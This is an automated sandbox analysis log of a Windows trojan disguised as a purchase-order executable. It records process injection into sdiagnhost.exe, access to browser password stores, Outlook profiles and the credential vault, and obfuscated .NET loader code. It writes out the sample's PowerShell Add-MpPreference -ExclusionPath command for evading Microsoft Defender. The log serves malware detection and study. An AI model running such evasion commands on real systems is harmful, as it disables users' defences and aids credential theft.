                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: String function: 0444EA12 appears 86 times
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: String function: 017AF290 appears 105 times
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: String function: 01777E54 appears 102 times
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: String function: 0179EA12 appears 86 times
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: String function: 0171B970 appears 278 times
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: String function: 01765130 appears 58 times
                Source: PO 20495088.exe, 00000000.00000002.2348800137.0000000005950000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs PO 20495088.exe
                Source: PO 20495088.exe, 00000000.00000002.2337539369.000000000117E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO 20495088.exe
                Source: PO 20495088.exe, 00000000.00000002.2350834120.0000000007384000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs PO 20495088.exe
                Source: PO 20495088.exe, 00000000.00000002.2362771807.0000000007D70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PO 20495088.exe
                Source: PO 20495088.exe, 00000000.00000002.2338435823.0000000002F93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs PO 20495088.exe
                Source: PO 20495088.exe, 00000006.00000002.2584175259.0000000001438000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesdiagnhost.exej% vs PO 20495088.exe
                Source: PO 20495088.exe, 00000006.00000002.2584440683.000000000181D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO 20495088.exe
                Source: PO 20495088.exeBinary or memory string: OriginalFilenameSL.exe" vs PO 20495088.exe
                Source: PO 20495088.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PO 20495088.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, QLyBkiYt0Go5aKO1Up.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, QLyBkiYt0Go5aKO1Up.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, yxAG4igptjhQAL7qfX.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, yxAG4igptjhQAL7qfX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, yxAG4igptjhQAL7qfX.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, yxAG4igptjhQAL7qfX.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, yxAG4igptjhQAL7qfX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, yxAG4igptjhQAL7qfX.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/7@9/9
                Source: C:\Users\user\Desktop\PO 20495088.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO 20495088.exe.logJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1992:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dxq3f4tx.mkz.ps1Jump to behavior
                Source: PO 20495088.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: PO 20495088.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\PO 20495088.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: sdiagnhost.exe, 00000009.00000003.2774468384.0000000002831000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000003.2768830043.0000000002804000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3898662883.0000000002824000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000003.2768960277.0000000002824000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3898662883.0000000002854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PO 20495088.exeReversingLabs: Detection: 39%
                Source: unknownProcess created: C:\Users\user\Desktop\PO 20495088.exe "C:\Users\user\Desktop\PO 20495088.exe"
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 20495088.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess created: C:\Users\user\Desktop\PO 20495088.exe "C:\Users\user\Desktop\PO 20495088.exe"
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeProcess created: C:\Windows\SysWOW64\sdiagnhost.exe "C:\Windows\SysWOW64\sdiagnhost.exe"
                Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 20495088.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess created: C:\Users\user\Desktop\PO 20495088.exe "C:\Users\user\Desktop\PO 20495088.exe"Jump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeProcess created: C:\Windows\SysWOW64\sdiagnhost.exe "C:\Windows\SysWOW64\sdiagnhost.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\PO 20495088.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: PO 20495088.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: PO 20495088.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: PO 20495088.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sKyuoUfZdk.exe, 00000008.00000000.2506589550.0000000000D2E000.00000002.00000001.01000000.0000000C.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3898414307.0000000000D2E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: PO 20495088.exe, 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000003.2587992892.00000000041F2000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000003.2584249545.0000000004046000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: SL.pdbSHA256 source: PO 20495088.exe
                Source: Binary string: wntdll.pdb source: PO 20495088.exe, PO 20495088.exe, 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, sdiagnhost.exe, 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000003.2587992892.00000000041F2000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000003.2584249545.0000000004046000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sdiagnhost.pdb source: PO 20495088.exe, 00000006.00000002.2584175259.0000000001438000.00000004.00000020.00020000.00000000.sdmp, sKyuoUfZdk.exe, 00000008.00000002.3898909136.0000000000998000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: SL.pdb source: PO 20495088.exe
                Source: Binary string: sdiagnhost.pdbGCTL source: PO 20495088.exe, 00000006.00000002.2584175259.0000000001438000.00000004.00000020.00020000.00000000.sdmp, sKyuoUfZdk.exe, 00000008.00000002.3898909136.0000000000998000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, yxAG4igptjhQAL7qfX.cs.Net Code: yumIxaZLbc System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PO 20495088.exe.7d70000.2.raw.unpack, yxAG4igptjhQAL7qfX.cs.Net Code: yumIxaZLbc System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 0_2_0158E962 pushfd ; retf 0_2_0158E969
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 0_2_0158F47A push eax; iretd 0_2_0158F481
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 0_2_054FE5A4 push esp; retf 0_2_054FE5A9
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_00414982 pushfd ; retf 6_2_00414975
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_004051D3 push ss; retf 6_2_004051D5
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_004182C3 push edi; retf 6_2_004182CB
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_00403360 push eax; ret 6_2_00403362
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_00426B13 push es; iretd 6_2_00426BEB
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_00414D3D push ebx; retf 6_2_00414D46
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0040BE37 push edi; ret 6_2_0040BE38
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_00418EAA push edx; ret 6_2_00418EB9
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0040D7AF push esp; iretd 6_2_0040D7B2
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_016F225F pushad ; ret 6_2_016F27F9
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_016F27FA pushad ; ret 6_2_016F27F9
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017209AD push ecx; mov dword ptr [esp], ecx6_2_017209B6
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_016F283D push eax; iretd 6_2_016F2858
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_016F9939 push es; iretd 6_2_016F9940
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_043D09AD push ecx; mov dword ptr [esp], ecx9_2_043D09B6
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001D0727 push edx; ret 9_2_001D0732
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001C2764 pushad ; ret 9_2_001C276C
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001D0848 push ebp; ret 9_2_001D0849
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001B8AD4 push edi; ret 9_2_001B8AD5
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001C4F60 push edi; retf 9_2_001C4F68
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001C752C push edi; retf 0A6Eh9_2_001C752B
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001D37B0 push es; iretd 9_2_001D3888
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001BD800 push eax; iretd 9_2_001BD82C
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001C19DA push ebx; retf 9_2_001C19E3
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001CDA70 push esi; retf 9_2_001CDA7B
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001CDA6E push esi; retf 9_2_001CDA7B
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001C5B47 push edx; ret 9_2_001C5B56
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001B1E70 push ss; retf 9_2_001B1E72
                Source: PO 20495088.exeStatic PE information: section name: .text entropy: 7.977130763165481
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, LFRYuTGvWOMHuIMSMI.csHigh entropy of concatenated method names: 'H9KkVS3009', 'wxdkbtvLcC', 'liSkmDofnt', 'YBkkN2iil5', 'PjcvAq8W16K1x12waLK', 'GeC4Rt8DRQr1OsH9FZL', 'ih5TQ88ScZRBVFyAIuY'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, pnLbb94JCMiLfVIuHb.csHigh entropy of concatenated method names: 'p2e4UMZ2uu', 'TlE49CJ1eZ', 'o2W4i74ku8', 'GcU4CKRtbb', 'idt486GQRG', 'sqc4Syuo89', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, FBMo2BQar0VrdJhNfA.csHigh entropy of concatenated method names: 'mpIkf4bXOA', 'w8OkYG9MUl', 'NWCkGUEoUY', 'whykjaqsvs', 'HANkrnaJrQ', 'Kq6ke6xmnF', 'fkrkptRbcy', 'v4yk05v7Lw', 'gYBkWX41xI', 'reJkJLd84Y'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, bPWVTiE5Z9HKxopMdc.csHigh entropy of concatenated method names: 'pojcb7stAW', 'voVcNiJNbu', 'oRcvwTblRj', 'relvsbXOOE', 'tvBcy7wxDd', 'Os9cYc4YLZ', 'Vctc3nifeE', 'AoKcGRfn6k', 'jvAcj3VvdX', 'xDpc5QgQ2y'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, tyALKZSpnBFiSHeyWo.csHigh entropy of concatenated method names: 'tbZxgwXRS', 'aIJZShBtK', 'eANqaUtU6', 'JSD7esr61', 'KnRAxWPWE', 'poIXLfcGo', 'loX9qtxJu2Hvh3Evhq', 'Pmb9gKcUOx15hv6YTb', 'Dd3vtQuRJ', 'xiI4OMn2F'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, LaABg007jsrdOW4gMH.csHigh entropy of concatenated method names: 'cPZiTYSMFq', 'xtRiueQjds', 'BK0i9LSE6l', 'IY5iCY4pP8', 'NAOiS2Fgsg', 'lvl9MVAcPI', 'VcZ92Xrego', 'p5H9VXhaw1', 'FT19bH72de', 'yFT9m9jasf'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, LXh1rrbtkEYvTPYdLc.csHigh entropy of concatenated method names: 'oAB9QaMIUf', 'NWF975udC9', 'Y8AUeEqfsW', 'SW0UpbLHKr', 'R7CU0tIRta', 'S47UWlTIxj', 'VSFUJXLGiG', 'uqHURw66T6', 'TqRUEOhVyG', 's3RUfAUOFQ'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, ClpgZZH8XG7DZVYVUb3.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bj7O8myEBn', 'inMO40uy0M', 'rdeOB4fo3c', 'q3COO0ps60', 'nkyOP8BaUP', 'FImOtOm0bI', 'e51OKY4D6v'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, EbZ842HBJFhIslYw36j.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cKo4yEWFaQ', 'G244YqmJKA', 'Log43C3XbE', 'Etk4GGNClC', 'ytr4jLNgwd', 'Xq445WLDCE', 'sDF4DZAesj'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, gaLxhIcHqu4ohILFAv.csHigh entropy of concatenated method names: 'aqhcgdfuIe', 'XLqcFrJwKm', 'ToString', 'ocncdlpX6c', 'bLRcuPsTO7', 'zs3cUtPW0D', 'i78c9cdoJP', 'pxDci36vZl', 'W91cCHABym', 'xTqcStLoqn'
                Source: 0.2.PO 20495088.exe.4202550.0.raw.unpack, dK3DXQMMhvybSpbFoC.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'cV7hmGmSPH', 'tMchNYJ0fp', 'VoghzNVgEd', 'K58LwEARN3', 'OhfLs5LcLx', 'e9vLhHMfFf', 'P4PLLvG7IT', 'AJ6M9AhZ4KLbTX44wae'
